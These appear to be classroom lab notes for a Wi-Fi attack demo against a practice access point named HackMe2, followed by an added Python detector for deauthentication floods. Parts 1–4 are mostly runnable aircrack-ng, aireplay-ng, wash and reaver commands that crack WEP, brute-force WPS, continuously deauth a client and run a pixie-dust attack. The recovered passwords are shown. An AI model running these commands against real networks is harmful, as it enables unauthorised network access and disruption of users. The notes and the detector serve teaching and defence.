Part 1:

Start monitor mode on a particular interface and kill problematic services which may interfere:
    airmon-ng
    airmon-ng check kill
    airmon-ng start wlan1

Look for nearby APs:
    airodump-ng wlan1mon
    (shows A0:04:60:A8:AE:68 WEP)

Scan a particular AP. Will show hosts, and dump packets to file HackMe2-01.cap:
    airodump-ng --bssid A0:04:60:A8:AE:68 --channel 1 --write HackMe2 wlan1mon

[Connect phone to show client]
[New tab]

Fake authentication:
    aireplay-ng -1 0 -a A0:04:60:A8:AE:68 -e HackMe2 wlan1mon

Use this command to wait for an ARP from the client, then replay it to the AP to collect packets:
    aireplay-ng -3 -b A0:04:60:A8:AE:68 -h C0:EE:FB:27:F5:9E wlan1mon

Backup: if not getting an ARP in class, replay a previously captured ARP (the interface argument is required by aireplay-ng):
    aireplay-ng -2 -r replay_arp-0302-225403.cap wlan1mon

Stop after ~30k packets are collected, then:
    aircrack-ng HackMe2-01.cap

Password DEADBEEF42 should display.

================

Part 2:

airodump output will show the new WPA2 AP:
    A0:04:60:A8:AE:68 WPA2 CCMP PSK HackMe2

Scan for WPS-enabled APs:
    wash -i wlan1mon

Attempt WPS bruteforce on the HackMe2 AP:
    reaver -i wlan1mon -b A0:04:60:A8:AE:68 -c 1 -vv -S

Will become locked, which we can see if we use wash again.

================

Part 3:

[Connect client so we can see it]

Look at airodump to find the client:
    airodump-ng --bssid A0:04:60:A8:AE:68 --channel 1 wlan1mon

Continuously deauth the client:
    aireplay-ng -0 0 -a A0:04:60:A8:AE:68 -c C0:EE:FB:27:F5:9E wlan1mon

[User restarts router]

We can now check the WPS status again:
    wash -i wlan1mon
[WPS now unlocked]

================

Part 4:

Try the pixie dust attack:
    reaver -i wlan1mon -b A0:04:60:A8:AE:68 -c 1 -vv -K 1
[Can see password "precisely"]

Turn off monitor mode and restart network services:
    airmon-ng stop wlan1mon
    service network-manager start
    service wpa_supplicant start
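The Part 3 deauth loop is the noisiest step in these notes: a continuous stream of deauthentication frames from one BSSID to one client is exactly the pattern a wireless IDS keys on, and it is the signal a defender would use to notice the lab in progress. Below is an added detection example (not part of the original lab notes) that implements a sliding-window deauth-flood check over 802.11 management frame records. The frame records are constructed inline to resemble what a monitor-mode capture would yield; the dict field names (ts, subtype, src, dst) are an assumption of this example, not a real library's schema, and the MAC addresses are the ones used on this page.

```python
"""Deauthentication-flood detector over 802.11 management frame records.

Added defensive example (not part of the original lab notes): a WIDS-style
check that flags when one BSSID sends many deauth/disassoc frames to a client
inside a short window. Frame records are constructed inline; the field names
ts/subtype/src/dst are an assumption of this example.
"""
from collections import defaultdict, deque

# 802.11 management frame subtypes of interest (values per the IEEE standard)
DEAUTH = 0x0C
DISASSOC = 0x0A


def detect_deauth_flood(frames, window_s=10.0, threshold=20):
    """Return alerts as (bssid, client, count) for every (src, dst) pair that
    sent at least `threshold` deauth/disassoc frames within `window_s` seconds.

    frames: iterable of dicts with keys ts (float seconds), subtype, src, dst,
            ordered by ts as a capture would be.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still in window
    alerted = set()               # pairs already reported, so one alert each
    alerts = []
    for f in frames:
        if f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        key = (f["src"].lower(), f["dst"].lower())
        q = recent[key]
        q.append(f["ts"])
        # Slide the window: drop timestamps older than window_s seconds.
        while q and f["ts"] - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((key[0], key[1], len(q)))
    return alerts


def sample_frames():
    """Constructed capture: two benign deauths five minutes apart (normal
    client roaming), then a burst of 30 deauths in three seconds from the
    page's AP BSSID to the page's client MAC."""
    ap, client = "A0:04:60:A8:AE:68", "C0:EE:FB:27:F5:9E"
    frames = [
        {"ts": 0.0,   "subtype": DEAUTH, "src": ap, "dst": client},
        {"ts": 300.0, "subtype": DEAUTH, "src": ap, "dst": client},
    ]
    frames += [
        {"ts": 600.0 + i * 0.1, "subtype": DEAUTH, "src": ap, "dst": client}
        for i in range(30)
    ]
    return frames


if __name__ == "__main__":
    for bssid, client, n in detect_deauth_flood(sample_frames()):
        print(f"ALERT deauth flood: {bssid} -> {client}: {n} frames in window")
```

The two isolated deauths are ignored because they fall outside the ten-second window by the time the burst starts; the burst trips the threshold on its twentieth frame and is reported once per (BSSID, client) pair rather than once per frame, which keeps the alert volume manageable during a sustained flood. In a real deployment the records would come from a monitor-mode capture, and the threshold should be tuned against the environment's baseline of legitimate deauths (roaming, AP reboots) to avoid false positives.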